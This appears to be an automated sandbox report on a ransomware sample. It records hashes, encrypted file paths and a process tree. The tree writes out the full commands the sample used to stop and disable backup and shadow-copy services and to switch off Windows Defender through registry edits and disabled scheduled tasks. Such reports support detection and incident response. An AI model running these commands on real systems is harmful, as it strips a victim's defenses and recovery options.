Analysis
  max time kernel: 50s
  max time network: 147s
  platform: windows10_x64
  resource: win10-en-20211208
  submitted: 10-01-2022 16:44

Static task: static1

Behavioral task: behavioral1
  Sample: 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe
  Resource: win7-en-20211208

Behavioral task: behavioral2
  Sample: 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe
  Resource: win10-en-20211208

General
  Target: 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe
  Size: 2.5MB
  MD5: 581d017db261422b60eed963c7823566
  SHA1: 6f35892e195de2c569c415a245a3302056bbfa08
  SHA256: 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc
  SHA512: c6142d6478d9a02d0269d3121143a64cb7e0a41d35e7924c9ecf7ced739133d847c4aafb9b851e2a9321a054ba3b9c40f00d8e430ad5d19af271ea28fab214f1

Malware Config
Signatures
Deletes Windows Defender Definitions (2 TTPs, 1 IoCs)
Uses mpcmdrun utility to delete all AV definitions.
Processes: MpCmdRun.exe
  pid   process
  1852  MpCmdRun.exe

Modifies security service (2 TTPs, 1 IoCs)
Processes: reg.exe
  description      ioc                                                                    process
  Set value (int)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"  reg.exe

Clears Windows event logs (1 TTPs)

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Drops file in Program Files directory (64 IoCs)
Processes: 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe
  description: File opened for modification (every row)
  process: 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe (every row)
  ioc:
  - C:\Program Files\7-Zip\Lang\sk.txt.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_QmspYuG7Byw0.pruhs
  - C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\.lastModified.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_3C212I7CBK40.pruhs
  - C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-swing-plaf_zh_CN.jar.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_CPyXVFY5Pik0.pruhs
  - C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_ja.jar.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_Ba8lWb03vhw0.pruhs
  - C:\Program Files\Microsoft Office\root\Office16\PROOF\MSHY7ES.LEX.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_N6u5fKWsb3U0.pruhs
  - C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SATIN\SATIN.ELM.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_aZCB-I6oalQ0.pruhs
  - C:\Program Files\Microsoft Office\root\Licenses16\ProjectProO365R_Subscription-pl.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_pImch74ef8E0.pruhs
  - C:\Program Files\Microsoft Office\root\Office16\1033\Bibliography\BIBFORM.XML.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_kOk2jyfpybI0.pruhs
  - C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\HintBarEllipses.16.White.png.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_WZXP1n9ZEb00.pruhs
  - C:\Program Files\Microsoft Office\root\Licenses16\StandardR_Retail-ul-oob.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_zgARkwTO-bw0.pruhs
  - C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\time-span-16.png.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_X5MLfLlFXIM0.pruhs
  - C:\Program Files\Java\jre1.8.0_66\lib\accessibility.properties.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_oUK2E2hv1Vs0.pruhs
  - C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail2-ul-oob.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_WNlTk7D1pXE0.pruhs
  - C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusE5R_SubTrial-ul-oob.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_XmEgC8bpu7k0.pruhs
  - C:\Program Files\Microsoft Office\root\Licenses16\ProjectProXC2RVL_MAKC2R-pl.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_9CG2zFqQVro0.pruhs
  - C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp6-ppd.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_VG62s1phjxM0.pruhs
  - C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019XC2RVL_MAKC2R-pl.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_H9C8yBfwHB80.pruhs
  - C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_ja.properties.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_-hOLDxEIZV00.pruhs
  - C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-loaders_ja.jar.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_7Gx88OuUQqE0.pruhs
  - C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-coredump.xml.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_ALINXfMDRlY0.pruhs
  - C:\Program Files\Microsoft Office\root\Integration\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_ELQ-aUqS1Bg0.pruhs
  - C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial3-ppd.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_pc0jXXDtiro0.pruhs
  - C:\Program Files\Java\jdk1.8.0_66\include\jvmticmlr.h.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_UebgeXh69sY0.pruhs
  - C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\org.eclipse.equinox.p2.metadata.repository.prefs.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_h0lpPLemYIQ0.pruhs
  - C:\Program Files\Microsoft Office\root\Office16\1033\client_eula.txt.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_44yL7ndjMz40.pruhs
  - C:\Program Files\Microsoft Office\root\Office16\1033\AccessRuntime2019_eula.txt.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_X7AwMIxi4mw0.pruhs
  - C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ECHO\PREVIEW.GIF.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_4lyZ98RYmNk0.pruhs
  - C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Web Server Extensions\16\BIN\1033\FPEXT.MSG.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_qZ2axiECZPY0.pruhs
  - C:\Program Files\Java\jdk1.8.0_66\jre\lib\resources.jar.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_NSEyg4DibWE0.pruhs
  - C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\javax.servlet_3.0.0.v201112011016.jar.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_qRFzL7LNoBQ0.pruhs
  - C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_ja.jar.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_LkcXR5peBRM0.pruhs
  - C:\Program Files\Microsoft Office\root\Integration\C2RManifest.wordmui.msi.16.en-us.xml.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_g1wOJ8DO-fY0.pruhs
  - C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Retail-ppd.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_Y5ag8w5zjP00.pruhs
  - C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_Trial-ppd.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_1LCaHKBTY600.pruhs
  - C:\Program Files\Common Files\microsoft shared\ink\et-EE\tipresx.dll.mui
  - C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.configuration_5.5.0.165303.jar.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_A0Erb8A57dE0.pruhs
  - C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.common.16.xml.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_KsOwxpR6ynY0.pruhs
  - C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp2-ul-phn.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_gqzlWCWiiHQ0.pruhs
  - C:\Program Files\Microsoft Office\root\Licenses16\OneNoteVL_KMS_Client-ppd.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_AoNNcuCuRmw0.pruhs
  - C:\Program Files\Common Files\System\msadc\ja-JP\msadcor.dll.mui.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_i7TT44knjxQ0.pruhs
  - C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN121.XML.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_MoOPI_F5g6s0.pruhs
  - C:\Program Files\Common Files\microsoft shared\ink\ar-SA\tipresx.dll.mui
  - C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_de.properties.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_e4oJWUexRvI0.pruhs
  - C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019VL_KMS_Client_AE-ppd.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_Go6WgLDhXWQ0.pruhs
  - C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-80.png.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_YbU6FIgJDYQ0.pruhs
  - C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN044.XML.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_wO-aJxziRF40.pruhs
  - C:\Program Files\7-Zip\Lang\es.txt.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_0FPCyxax_WU0.pruhs
  - C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.nl_ja_4.4.0.v20140623020002.jar.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_T-xEsP_e4bc0.pruhs
  - C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp3-pl.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_ypk6w6mIS6A0.pruhs
  - C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp4-pl.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_VJqbfBphG_E0.pruhs
  - C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\AFTRNOON\PREVIEW.GIF.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_HXcAW1WZiMs0.pruhs
  - C:\Program Files\Common Files\System\msadc\es-ES\msaddsr.dll.mui.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_JoK5A66GBzc0.pruhs
  - C:\Program Files\Common Files\microsoft shared\ink\ko-KR\tipresx.dll.mui
  - C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedback.gif.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_y4EJt4qr44I0.pruhs
  - C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_ja.jar.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_XRpuTVkiato0.pruhs
  - C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.scale-180.png.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_k7PZdeQ--VU0.pruhs
  - C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_ja_4.4.0.v20140623020002.jar.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_Zi6BcsKTk3A0.pruhs
  - C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_ja.jar.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_HoNihofGX3c0.pruhs
  - C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Retail-pl.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_9UPbXtGxybA0.pruhs
  - C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp4-ul-phn.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_RlDjZpa5JP40.pruhs
  - C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.properties.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_Erp_za8zDF80.pruhs
  - C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-sendopts.xml.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_v36NTEEFSS80.pruhs
  - C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Trial2-ul-oob.xrm-ms.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_TDjqkQ-7mZA0.pruhs
  - C:\Program Files\Microsoft Office\root\Office16\1033\AccessRuntime_eula.txt.v8jZEpbXN-vmDApSXEhwlstJIydcjAlA7sWLAB3qriX_zvIbj6ipyFU0.pruhs

Launches sc.exe
Sc.exe is a Windows utility to control services on the system.

Interacts with shadow copies (2 TTPs, 1 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes: vssadmin.exe
  pid   process
  3500  vssadmin.exe

Modifies registry class (3 IoCs)
Processes: reg.exe, reg.exe, reg.exe
  description  ioc                                                                           process
  Key deleted  \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP      reg.exe
  Key deleted  \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP          reg.exe
  Key deleted  \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP  reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses (8 IoCs)
Processes: powershell.exe, powershell.exe, 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe
  pid   process
  3564  powershell.exe
  3564  powershell.exe
  3564  powershell.exe
  752   powershell.exe
  752   powershell.exe
  752   powershell.exe
  3484  213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe
  3484  213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes: wevtutil.exe, wevtutil.exe, wevtutil.exe, wmic.exe, wmic.exe
  description                  pid   process
  Token: SeSecurityPrivilege   2716  wevtutil.exe
  Token: SeBackupPrivilege     2716  wevtutil.exe
  Token: SeSecurityPrivilege   3164  wevtutil.exe
  Token: SeBackupPrivilege     3164  wevtutil.exe
  Token: SeSecurityPrivilege   1616  wevtutil.exe
  Token: SeBackupPrivilege     1616  wevtutil.exe
  wmic.exe, pid 1764, one row per token in this order: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  wmic.exe, pid 3104, one row per token in this order: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  wmic.exe, pid 3104 (second sequence), one row per token in this order: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege

Suspicious use of WriteProcessMemory (64 IoCs)
Processes: 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe, net.exe (x9)
  Columns: description | pid | process | target process. Each row below is logged as 3 identical entries unless noted.
  PID 3484 wrote to memory of 908  | 3484 | 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | net.exe
  PID 908 wrote to memory of 980   | 908  | net.exe | net1.exe
  PID 3484 wrote to memory of 2292 | 3484 | 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | net.exe
  PID 2292 wrote to memory of 540  | 2292 | net.exe | net1.exe
  PID 3484 wrote to memory of 684  | 3484 | 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | net.exe
  PID 684 wrote to memory of 3184  | 684  | net.exe | net1.exe
  PID 3484 wrote to memory of 3680 | 3484 | 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | net.exe
  PID 3680 wrote to memory of 3576 | 3680 | net.exe | net1.exe
  PID 3484 wrote to memory of 3636 | 3484 | 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | net.exe
  PID 3636 wrote to memory of 2924 | 3636 | net.exe | net1.exe
  PID 3484 wrote to memory of 2764 | 3484 | 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | net.exe
  PID 2764 wrote to memory of 1408 | 2764 | net.exe | net1.exe
  PID 3484 wrote to memory of 2596 | 3484 | 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | net.exe
  PID 2596 wrote to memory of 1256 | 2596 | net.exe | net1.exe
  PID 3484 wrote to memory of 3548 | 3484 | 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | net.exe
  PID 3548 wrote to memory of 2220 | 3548 | net.exe | net1.exe
  PID 3484 wrote to memory of 716  | 3484 | 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | net.exe
  PID 716 wrote to memory of 1440  | 716  | net.exe | net1.exe
  PID 3484 wrote to memory of 988  | 3484 | 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | sc.exe
  PID 3484 wrote to memory of 1296 | 3484 | 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | sc.exe
  PID 3484 wrote to memory of 1476 | 3484 | 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | sc.exe
  PID 3484 wrote to memory of 1732 | 3484 | 213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe | sc.exe  (1 entry)

Processes
(tree; indentation shows parent/child depth)

- C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe  (PID 3484)
  Command line: "C:\Users\Admin\AppData\Local\Temp\213bb679f8499e9da5ecd1d9f76306485227c282a20547576828b015a08985bc.bin.sample.exe"
  Signatures: Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory

  - C:\Windows\SysWOW64\net.exe  (PID 908)
    Command line: net.exe stop "SamSs" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\net1.exe  (PID 980)
      Command line: C:\Windows\system32\net1 stop "SamSs" /y

  - C:\Windows\SysWOW64\net.exe  (PID 2292)
    Command line: net.exe stop "SDRSVC" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\net1.exe  (PID 540)
      Command line: C:\Windows\system32\net1 stop "SDRSVC" /y

  - C:\Windows\SysWOW64\net.exe  (PID 684)
    Command line: net.exe stop "SstpSvc" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\net1.exe  (PID 3184)
      Command line: C:\Windows\system32\net1 stop "SstpSvc" /y

  - C:\Windows\SysWOW64\net.exe  (PID 3680)
    Command line: net.exe stop "UI0Detect" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\net1.exe  (PID 3576)
      Command line: C:\Windows\system32\net1 stop "UI0Detect" /y

  - C:\Windows\SysWOW64\net.exe  (PID 3636)
    Command line: net.exe stop "vmicvss" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\net1.exe  (PID 2924)
      Command line: C:\Windows\system32\net1 stop "vmicvss" /y

  - C:\Windows\SysWOW64\net.exe  (PID 2764)
    Command line: net.exe stop "VSS" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\net1.exe  (PID 1408)
      Command line: C:\Windows\system32\net1 stop "VSS" /y

  - C:\Windows\SysWOW64\net.exe  (PID 2596)
    Command line: net.exe stop "wbengine" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\net1.exe  (PID 1256)
      Command line: C:\Windows\system32\net1 stop "wbengine" /y

  - C:\Windows\SysWOW64\net.exe  (PID 3548)
    Command line: net.exe stop "WebClient" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\net1.exe  (PID 2220)
      Command line: C:\Windows\system32\net1 stop "WebClient" /y

  - C:\Windows\SysWOW64\net.exe  (PID 716)
    Command line: net.exe stop "UnistoreSvc_12e21" /y
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\net1.exe  (PID 1440)
      Command line: C:\Windows\system32\net1 stop "UnistoreSvc_12e21" /y

  - C:\Windows\SysWOW64\sc.exe  (PID 988)
    Command line: sc.exe config "SamSs" start= disabled
  - C:\Windows\SysWOW64\sc.exe  (PID 1296)
    Command line: sc.exe config "SDRSVC" start= disabled
  - C:\Windows\SysWOW64\sc.exe  (PID 1476)
    Command line: sc.exe config "SstpSvc" start= disabled
  - C:\Windows\SysWOW64\sc.exe  (PID 1732)
    Command line: sc.exe config "UI0Detect" start= disabled
  - C:\Windows\SysWOW64\sc.exe  (PID 4076)
    Command line: sc.exe config "vmicvss" start= disabled
  - C:\Windows\SysWOW64\sc.exe  (PID 2056)
    Command line: sc.exe config "VSS" start= disabled
  - C:\Windows\SysWOW64\sc.exe  (PID 2508)
    Command line: sc.exe config "wbengine" start= disabled
  - C:\Windows\SysWOW64\sc.exe  (PID 2864)
    Command line: sc.exe config "WebClient" start= disabled
  - C:\Windows\SysWOW64\sc.exe  (PID 3392)
    Command line: sc.exe config "UnistoreSvc_12e21" start= disabled

  - C:\Windows\SysWOW64\reg.exe  (PID 1380)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  - C:\Windows\SysWOW64\reg.exe  (PID 2460)
    Command line: reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  - C:\Windows\SysWOW64\reg.exe  (PID 3248)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  - C:\Windows\SysWOW64\reg.exe  (PID 1504)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  - C:\Windows\SysWOW64\reg.exe  (PID 2372)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  - C:\Windows\SysWOW64\reg.exe  (PID 1456)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  - C:\Windows\SysWOW64\reg.exe  (PID 3168)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  - C:\Windows\SysWOW64\reg.exe  (PID 928)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  - C:\Windows\SysWOW64\reg.exe  (PID 1104)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  - C:\Windows\SysWOW64\reg.exe  (PID 540)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  - C:\Windows\SysWOW64\reg.exe  (PID 4036)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  - C:\Windows\SysWOW64\reg.exe  (PID 3708)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  - C:\Windows\SysWOW64\reg.exe  (PID 3912)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  - C:\Windows\SysWOW64\reg.exe  (PID 3456)
    Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  - C:\Windows\SysWOW64\reg.exe  (PID 612)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  - C:\Windows\SysWOW64\reg.exe  (PID 1068)
    Command line: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

  - C:\Windows\SysWOW64\schtasks.exe  (PID 516)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  - C:\Windows\SysWOW64\schtasks.exe  (PID 1244)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  - C:\Windows\SysWOW64\schtasks.exe  (PID 1488)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  - C:\Windows\SysWOW64\schtasks.exe  (PID 2428)
    Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:2516
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1680
-
